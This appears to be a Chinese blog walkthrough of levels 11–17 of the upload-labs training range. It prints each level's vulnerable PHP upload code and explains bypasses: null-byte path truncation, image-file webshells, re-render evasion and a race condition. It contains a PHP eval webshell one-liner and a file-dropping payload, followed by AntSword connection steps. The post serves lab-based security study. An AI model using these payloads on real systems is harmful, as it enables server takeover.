12.upload-labs靶场通关详解(11~17)

最新推荐文章于 2024-11-16 11:27:24 发布
最新推荐文章于 2024-11-16 11:27:24 发布
阅读量2k 收藏 41
点赞数 53
文章标签: android web安全 架构 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72760503/article/details/140896605
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

1、Pass11(白名单:get00截断)

在这里插入图片描述

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

解析

① 分析代码,这是以时间戳的方式对上传文件进行命名,使用上传路径名%00截断绕过,不过这需要对文件有足够的权限,比如说创建文件夹,上传的文件名写成1.jpg, save_path改成…/upload/1.php%00 (1.php%00.jpg经过url转码后会变为1.php\000.jpg),最后保存下来的文件就是1.php

注意: php版本要小于5.3.4,5.3.4及以上已经修复该问题;magic_quotes_gpc需要为OFF状态

在这里插入图片描述

② 放包后复制图片链接,用中国蚁剑连接,连接成功

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2、Pass12(白名单:post00截断)

在这里插入图片描述

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

解析:

① 系统在对文件名进行读取时,如果遇到0x00,就会认为读取已经结束。但要注意是文件的十六进制内容里的00,而不是文件名中的00,所以我们要在1.php后面加一个任意的字,然后在Hex将这个字的16进制数变成00

在这里插入图片描述

在这里插入图片描述

② 放包后复制图片链接,用中国蚁剑连接,连接成功

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3、Pass13(图片马绕过:图片头检查)

在这里插入图片描述

源码

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

解析

在这里插入图片描述

① 编写一个2.php的一句话木马,使用命令copy 1.jpg/b + 2.php/a 2.jpg,将php一句话追加到jpg图片末尾,代码不全的话,人工补充完整。形成一个包含Webshell代码的新jpg图片,然后直接上传即可。

在这里插入图片描述

在这里插入图片描述

② 上传刚才合成的2.jpg,然后复制图像连接

在这里插入图片描述

③ 访问http://192.168.1.11:90/upload-labs/include.php?file=upload/6620240804142220.png,可以看到上传成功了

在这里插入图片描述

4、Pass14(图片马绕过:getimagesize())

在这里插入图片描述

源码:

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)>=0){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

解析

做法同14关一样

getimagesize() 函数用于获取图像尺寸 ,索引 2 给出的是图像的类型,返回的是数字,其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JPC,10 = JP2,11 = JPX,12 = JB2,13 = SWC,14 = IFF,15 = WBMP,16 = XBM

image_type_to_extension() 函数用于获取图片后缀

5、Pass15(图片马绕过:exif_imagetype)

源码

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)>=0){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

解析

做法同14关一样

exif_imagetype() 此函数是php内置函数,用来获取图片类型

6、Pass16(二次渲染绕过)

源码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

解析

① 上传1.gif的图片,上传完成后的图片进行另存为2.gif

在这里插入图片描述

② 通过010editor对原图片和另存为的图片进行比较,找到相同部分,在这个部分下填写一句话木马

<?php @eval($_REQUEST['1']);?>

在这里插入图片描述

在这里插入图片描述

③ 再重新上传1.gif文件,然后另存为一张.gif的图片。用中国蚁剑进行连接,连接成功

在这里插入图片描述

7、Pass17(条件竞争)

源码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

解析

① 上传一个2.php的文件,在文件中编写以下代码进行上传

<?php fputs(fopen('2.php','w'),'<?php phpinfo();?>');?>

② 抓包后放到测试器进行攻击

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

ze^0
关注
Upload LABS Pass-11
wangyuxiang946的博客
07-05 1万+
uploadlabs11upload labs 第十一关在服务端使用了白名单 , 但文件保存路径外漏 , 可以使用00截断
upload-labs靶场Pass-11
wanggonghanfei的博客
10-21 223
upload-labs靶场Pass-11 双写绕过
php判断文件是否为图片
Elvis技术小屋
06-24 2050
利用getimagesize函数:   function isImage($filename){     $types = '.gif|.jpeg|.png|.bmp';//定义检查的图片类型     if(file_exists($filename)){         $info = getimagesize($filename);         $ext
11.upload-labs靶场通关详解(1~10)
m0_72760503的博客
08-04 2183
操作系统:推荐windows(除了Pass-19必须在linux下,其余Pass都可以在windows上运行)php版本:推荐5.2.17(其他版本可能会导致部分Pass无法突破)php组件:php_gd2,php_exif(部分Pass需要开启这两个组件)apache:以moudel方式连接。
upload-labs靶场通关详解(1-15)
guowu666的博客
05-10 1326
upload-labs 通关详解
upload-labs-master靶场通关攻略
Nai_zui_jiang的博客
09-02 709
上传并进行抓包,修改后缀为php
UPload-labs-masters靶场通关攻略
cheapkiller的博客
07-26 322
1.创建一个非图片文件输入一句话木马然后点击上传​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​。4.修改扩展名后将其放行,放行后右键单击新建标签页打开图像。后面的关卡也会持续更新的,关注我查看最新更新信息哦。2.切记文件要改成php文件然后再进行抓包。1.打开第二关之后还是一样选择文件。2.然后使用bp进行抓包。3.抓包之后要修改扩展名。5.就可以得到显示页面了。最后就是打开文件内容。
UPLOAD-LABS靶场[超详细通关教程,通关攻略]
muyuchen110的博客
07-27 3072
Upload-labs是一个使用PHP语言编写,专门用于渗透测试和CTF中遇到的各种文件上传漏洞的靶场。目前一共20关,每个关都包含着不同上传方式。文件上传漏洞:用户可以越过其本身权限,向服务器上传可执行的动态脚本文件,例如木马、病毒、恶意脚本或者WebShell等。文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞的利用无限扩大。
upload-labs-master靶场通关操作文字解说
canyiguichen的博客
09-16 362
写入到一个a.php文件中。使用点号绕过,因为你会发现,在windows中重命名文件的时候,我们在文件末尾加上点号,这个点号会被删除。上传一句话木马的时候,发现不能上传,因为他不允许上传.asp,.aspx,.php,.jsp后缀文件。这一关是提示我们类型不对,那么我们上传一句话.php的时候抓包,在那里修改我们的文件类型即可。我们上传.php7后缀的文件,发现还是能上传,这是因为他使用的黑名单还是没有过滤这个后缀名。.php2 .php3 .php4 .php5 .php6 .php7这些都能用。
upload-labs通关手册
12-03
详细记录了upload-labs靶场通关步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
upload-labs通关攻略教程二【12-18关】
m0_55854679的博客
06-05 1656
upload-labs通关攻略教程一(01-11关) Pass-12-(白名单验证,get型00截断) 查看题目源码 白名单判断,只允许三中文件类型。strrpos(string,find,start)函数查找字符串中最后一次出现的位置,这里是将后缀名提取赋值给file_exit.但$img_path是直接拼接,我们可以通过抓包修改get参数,然后通过file_ext无效,这样就可以上传php文件因此可以利用%00截断绕过。 %00截断的概念和原理: 在url中%00表示ASCll码中的0,而0作为特殊
upload-labs安装及攻略
热门推荐
K_ShenH的博客
01-14 2万+
upload-labs靶场的安装搭建(windows) (1)首先当然是需要phpstudy的环境,所以要先下载安装phpstudy。 (2)然后到github的网址中下载源码的压缩包。 github网址:https://github.com/Tj1ngwe1/upload-labs (3)下载后解压缩到phpstudy目录下的WWW子文件夹中,这里要注意吧压缩包的名字改成upload-labs,不然靶场的页面会显示得不对。 (4)然后在输入url HTTPS:...
upload-labs通关总结 | 那些年踩过的坑
m0_56691564的博客
10-31 1488
本文就是简单总结一下upload-lab通关方法和踩过的坑,参考的通关教程放在文末,需要的小伙伴去看~
upload-labs靶场
qq_49518993的博客
05-29 823
pass1 前端js校验,因为是前端验证所以我们可以选择在前端修改代码checkFile()函数,把他删除 然后链接中国菜刀,上传成功 pass2
android10 Wifi扫描源码解析
yang_0323的博客
11-13 858
本文详述了Android中WiFi的扫描过程,从源码层面进行解析
用户管理【MySQL】
qq_2972806103的博客
11-13 441
创建用户,回收权限、授权
Android compose原创组件】在Compose里面实现内容不满一屏也可以触发边界阻尼效果的一种可用方法
最新发布
许多仙的博客
11-16 272
在安卓 View 传统命令式开发里面提供了非常多稳定美观体验好的组件,但是目前Compose还未有可用的组件,比如View中可以使用 coordinatorlayout 的滚动效果可以实现局部(即使内容不满一屏也可以触发滚动边界阻尼效果),为了最小成本实现相同的效果,我们可以利用Column的滚动边界为基础间接实现类似效果。
Android LiveData 处理数据倒灌的几种措施
嗯...
11-15 976
在observe/observeForever时创建新的LiveData,并且根据observer保存该LiveData到mObserverMap中,而且该LiveData订阅相关的observer;其思路也很清晰,为每个传入的observer对象携带一个布尔类型的值,作为其是否能进入observe方法的开关。数据变化的通知会同时传递给两个页面中的观察者,导致它们的内部逻辑可能因为共享的数据处理而出现混乱,互相影响。每次setValue后,打开所有Observer的开关,允许所有observe执行。
Android 13 实现屏幕熄屏一段时候后关闭 Wi-Fi 和清空多任务列表
m0_60898338的博客
11-14 276
当设备屏幕关闭一段时间后,自动关闭 Wi-Fi 连接并清空多任务菜单。
upload-labs靶场通关
09-14
要通过upload-labs靶场,你需要完成以下几个步骤: 1. 首先,你需要上传一个文件到服务器。通过使用move_uploaded_file函数,将临时存储路径的文件移动到指定的上传目录。具体代码可以参考引用中的示例。 2. 上传目录的路径可以根据需求进行设置,通常是在代码中定义一个常量来表示上传目录的路径。例如,将上传文件保存在../upload/目录下,可以使用引用中的路径作为上传目录。 3. 为了确保上传的文件具有唯一的文件名,你可以使用一些方法来生成一个唯一的文件名,例如使用时间戳、随机字符串等。然后,将上传的路径和文件名进行拼接,形成最终的上传文件路径。具体代码可以参考引用中的示例。 4. 当文件上传成功后,你可以根据靶场的要求,继续完成后续的操作,例如在上传的文件中发现漏洞或者进行文件包含等攻击。 总结起来,完成upload-labs靶场通关,你需要使用move_uploaded_file函数将临时存储路径的文件移动到指定的上传目录,设置上传目录的路径,并确保上传的文件具有唯一的文件名。这样就能顺利通过upload-labs靶场了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值